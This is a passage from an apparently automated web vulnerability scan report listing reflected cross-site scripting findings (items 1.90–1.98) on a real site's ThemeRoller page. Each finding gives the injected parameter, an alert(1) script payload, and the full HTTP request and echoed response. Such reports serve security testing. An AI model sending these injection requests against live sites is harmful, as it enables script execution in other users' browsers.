...[SNIP]...
orDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.pnga98d2"><script>alert(1)</script>3cb669f0c48&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHig
...[SNIP]...

1.90. http://jqueryui.com/themeroller/ [bgTextureContent parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78c7e"><script>alert(1)</script>74dec3933ad was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png78c7e"><script>alert(1)</script>74dec3933ad&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:21:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120110

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png78c7e"><script>alert(1)</script>74dec3933ad&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefaul
...[SNIP]...

1.91. http://jqueryui.com/themeroller/ [bgTextureDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e447d"><script>alert(1)</script>8562d8ecc01 was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.pnge447d"><script>alert(1)</script>8562d8ecc01&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:22:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120110

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.pnge447d"><script>alert(1)</script>8562d8ecc01&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&ic
...[SNIP]...

1.92. http://jqueryui.com/themeroller/ [bgTextureError parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgTextureError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf048"><script>alert(1)</script>f93ea758174 was submitted in the bgTextureError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.pngcf048"><script>alert(1)</script>f93ea758174&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:25:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120110

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.pngcf048"><script>alert(1)</script>f93ea758174&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgText
...[SNIP]...

1.93. http://jqueryui.com/themeroller/ [bgTextureHeader parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8be4a"><script>alert(1)</script>8fe8b3a7116 was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png8be4a"><script>alert(1)</script>8fe8b3a7116&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:20:46 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120110

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
rseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png8be4a"><script>alert(1)</script>8fe8b3a7116&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcConte
...[SNIP]...

1.94. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgTextureHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76c48"><script>alert(1)</script>710e7345956 was submitted in the bgTextureHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png76c48"><script>alert(1)</script>710e7345956&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:24:22 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120110

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
7bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png76c48"><script>alert(1)</script>710e7345956&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=c
...[SNIP]...

1.95. http://jqueryui.com/themeroller/ [bgTextureHover parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebd47"><script>alert(1)</script>5c6bd411a2e was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.pngebd47"><script>alert(1)</script>5c6bd411a2e&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:22:58 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120110

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
tent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.pngebd47"><script>alert(1)</script>5c6bd411a2e&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009
...[SNIP]...

1.96. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgTextureOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c68d8"><script>alert(1)</script>af61a3700a5 was submitted in the bgTextureOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.pngc68d8"><script>alert(1)</script>af61a3700a5&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:25:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120110

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
olorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.pngc68d8"><script>alert(1)</script>af61a3700a5&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadi
...[SNIP]...

1.97. http://jqueryui.com/themeroller/ [bgTextureShadow parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgTextureShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1b58"><script>alert(1)</script>389286bb224 was submitted in the bgTextureShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.pnge1b58"><script>alert(1)</script>389286bb224&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:26:23 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120110

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.pnge1b58"><script>alert(1)</script>389286bb224&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.98. http://jqueryui.com/themeroller/ [borderColorActive parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the borderColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab614"><script>alert(1)</script>ca0cfcb45f was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7ab614"><script>alert(1)</script>ca0cfcb45f&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:23:57 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120173

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
